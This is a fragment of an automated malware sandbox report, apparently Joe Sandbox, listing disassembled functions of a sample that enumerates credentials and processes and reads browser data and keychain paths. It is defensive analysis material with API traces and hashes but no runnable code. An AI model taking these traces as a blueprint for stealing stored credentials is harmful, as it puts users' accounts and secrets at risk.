                                          • memset.MSVCRT ref: 00413E07
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                          • API String ID: 912665193-1740548384
                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                          • memcpy.MSVCRT ref: 0040B60D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                          • String ID: BIN
                                          • API String ID: 1668488027-1015027815
                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                          • String ID:
                                          • API String ID: 2947809556-0
                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID:
                                          • API String ID: 1690352074-0
                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0041898C
                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: InfoSystemmemset
                                          • String ID:
                                          • API String ID: 3558857096-0
                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                          APIs
                                          • memset.MSVCRT ref: 004455C2
                                          • wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 0044570D
                                          • memset.MSVCRT ref: 00445725
                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                          • memset.MSVCRT ref: 0044573D
                                          • memset.MSVCRT ref: 00445755
                                          • memset.MSVCRT ref: 004458CB
                                          • memset.MSVCRT ref: 004458E3
                                          • memset.MSVCRT ref: 0044596E
                                          • memset.MSVCRT ref: 00445A10
                                          • memset.MSVCRT ref: 00445A28
                                          • memset.MSVCRT ref: 00445AC6
                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                          • memset.MSVCRT ref: 00445B52
                                          • memset.MSVCRT ref: 00445B6A
                                          • memset.MSVCRT ref: 00445C9B
                                          • memset.MSVCRT ref: 00445CB3
                                          • _wcsicmp.MSVCRT ref: 00445D56
                                          • memset.MSVCRT ref: 00445B82
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                          • memset.MSVCRT ref: 00445986
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                          • API String ID: 2745753283-3798722523
                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                          Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                          • String ID: $/deleteregkey$/savelangfile
                                          • API String ID: 2744995895-28296030
                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                          Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                          • wcsrchr.MSVCRT ref: 0040B738
                                          • memset.MSVCRT ref: 0040B756
                                          • memset.MSVCRT ref: 0040B7F5
                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                          • memset.MSVCRT ref: 0040B851
                                          • memset.MSVCRT ref: 0040B8CA
                                          • memcmp.MSVCRT ref: 0040B9BF
                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                          • memset.MSVCRT ref: 0040BB53
                                          • memcpy.MSVCRT ref: 0040BB66
                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                          • String ID: chp$v10
                                          • API String ID: 170802307-2783969131
                                          • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                          • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                          • memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                          • wcschr.MSVCRT ref: 0040E3B8
                                          • memcpy.MSVCRT ref: 0040E3EC
                                          • memcpy.MSVCRT ref: 0040E407
                                          • memcpy.MSVCRT ref: 0040E422
                                          • memcpy.MSVCRT ref: 0040E43D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                          • API String ID: 3073804840-2252543386
                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                          • String ID:
                                          • API String ID: 3715365532-3916222277
                                          • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                          • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                          • String ID: bhv
                                          • API String ID: 327780389-2689659898
                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
